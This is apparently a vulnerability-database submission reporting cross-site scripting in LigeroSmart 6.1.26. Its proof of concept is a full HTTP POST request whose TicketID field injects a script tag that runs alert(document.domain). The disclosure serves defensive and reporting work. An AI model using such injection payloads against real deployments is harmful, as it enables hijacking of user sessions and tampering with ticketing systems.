Submit #729402: LigeroSmart 6.1.26 Cross Site Scripting

Title: LigeroSmart 6.1.26 Cross Site Scripting

Description: It was identified that the TicketID parameter allows for cross-site scripting.

    POST /otrs/index.pl HTTP/1.1
    Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
    Referer: http://192.168.12.212/otrs/index.pl
    Cookie: OTRSAgentInterface=2gHtFoG2h2zqFgLp8ZG1PJLBN8aaaZsd
    Content-Length: 458
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Encoding: gzip,deflate,br
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
    Host: 192.168.12.212
    Connection: Keep-alive

    ------------YWJkMTQzNDcw
    Content-Disposition: form-data; name="Action"

    AgentTicketBulk
    ------------YWJkMTQzNDcw
    Content-Disposition: form-data; name="ChallengeToken"

    XeWmehc6OomplK79F9jNC7Dv2VSk6uZC
    ------------YWJkMTQzNDcw
    Content-Disposition: form-data; name="LastColumnFilter"

    aYlNlfdX
    ------------YWJkMTQzNDcw
    Content-Disposition: form-data; name="TicketID"

    1</script><script>alert(document.domain)</script>
    ------------YWJkMTQzNDcw--

Docker was installed and tests were performed. https://github.com/LigeroSmart/docker-ligerosmart

Source: https://github.com/LigeroSmart/ligerosmart/issues/280
User: chor4o (UID 52584)
Submission: 01/02/2026 16:24 (4 months ago)
Moderation: 01/16/2026 17:38 (14 days later)
Status: Accepted
VulDB entry: 341601 [LigeroSmart up to 6.1.26 /otrs/index.pl TicketID cross site scripting]
Points: 20
